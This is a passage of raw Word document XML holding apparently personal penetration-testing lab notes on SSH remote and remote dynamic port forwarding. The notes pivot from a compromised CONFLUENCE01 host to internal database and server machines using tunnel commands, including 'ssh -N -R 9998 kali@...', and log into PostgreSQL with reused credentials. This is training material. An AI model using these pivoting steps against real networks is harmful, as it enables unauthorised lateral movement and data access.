      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> two socket pairs as the argument</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket is defined first, and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forwarding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket is second.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="790"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on our Kali machine (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="790"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forward </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all traffic to the PostgreSQL port on PGDATABASE01 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.215:5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSH connection back to our Kali machine was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="517" name="image496.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image496.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189"/>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8EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this in our kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm that our remote port forward port is listening by checking if port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is open on our Kali loopback interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="810"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With the port forward active, we can now query port 2345 on the Kali loopback interface as though interacting directly with the PostgreSQL service on PGDATABASE01. On our Kali machine, we will use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, passing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the host (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the port (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), and using the database credentials of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) we found earlier on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h 127.0.0.1 -p 2345 -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify our own kali by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This then gets sent back to CONFLUENCE who forwards it to PGDATABASE01 on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008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FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xvrn4ne0f7y7" w:id="79"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Remote Dynamic Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Similar to the set up of SSH Remote Port Forwarding. We just run SSH from the middleman (CONFLUENCE01) to our Kali, which means the middleman is the SSH Client and Kali is SSH Server. And this actually sets up a SOCKS Proxy on our Kali on a specific port, which we can then connect to ourselves using Proxychains. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We write commands as if they are run by the middleman (CONFLUENCE01). So that means we specify IP and port of the target machine, since these commands are sent via proxy to middleman, and then forwarded by SSH client software (on middleman) to the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000900">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000901">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just as the name suggests, remote dynamic port forwarding creates a dynamic port forward in the remote configuration. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy port is bound to the SSH server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(instead of the SSH Client, like it was in the SSH Dynamic Port Forwarding)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">traffic is forwarded from the SSH client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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="26" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1790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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Info: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote dynamic port forwarding has only been available since October 2017's OpenSSH 7.6. Despite this, only the OpenSSH client needs to be version 7.6 or above to use it - the server version doesn't matter.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2540000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="27" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="254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09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is going to be what we are doing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000090A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are going to be sending an SSH connection from CONFLUENCE01 to our Kali machine. The packets sent to Kali machine then are sent back to CONFLUENCE01, where they can go to ANY socket (thanks to the help of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy on SSH Server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) that CONFLUENCE01, and in this case will be the belonging to MULTISERVER03</w:t>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t xml:space="preserve">The SSH session is initiated from CONFLUENCE01, connecting to the Kali machine, which is running an SSH server. The SOCKS proxy port is then bound to the Kali machine on TCP/9998. Packets sent to that port will be pushed back through the SSH tunnel to CONFLUENCE01, where they will be forwarded based on where they're addressed - in this case, MULTISERVER03.</w:t>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t xml:space="preserve">The remote dynamic port forwarding command is relatively simple, although (slightly confusingly) it uses the same</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option as classic remote port forwarding. The difference is that when we want to create a remote dynamic port forward, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we pass only one socket</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the socket we want to listen on the SSH server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We don't even need to specify an IP address; if we just pass a port, it will be bound to the loopback interface of the SSH server by default</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000090F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000910">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -R 9998 kali@192.168.118.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000911">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
